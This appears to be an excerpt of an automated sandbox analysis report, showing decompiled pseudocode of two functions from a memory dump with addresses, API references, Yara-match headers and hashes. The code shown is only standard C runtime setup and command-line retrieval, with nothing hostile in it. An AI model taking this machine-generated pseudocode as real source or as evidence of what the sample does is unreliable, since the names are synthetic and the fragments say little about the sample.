                                                                    C-Code - Quality: 100%
                                                                    			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                    0x004025ba
                                                                    0x004025bf
                                                                    0x004025cb
                                                                    0x004025d0
                                                                    0x004025d5
                                                                    0x004025d7
                                                                    0x004025e2
                                                                    0x004025d9
                                                                    0x004025d9
                                                                    0x00000000
                                                                    0x004025d9
                                                                    0x004025cd
                                                                    0x004025cd
                                                                    0x004025cf
                                                                    0x004025cf

                                                                    APIs
                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                      • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                    • String ID:
                                                                    • API String ID: 1761009282-0
                                                                    • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                    • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                                                                    0x0040557b
                                                                    0x00405586
                                                                    0x0040558d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CommandLine
                                                                    • String ID: @4Q
                                                                    • API String ID: 3253501508-681428551
                                                                    • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                    • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                                                                    • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                    • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%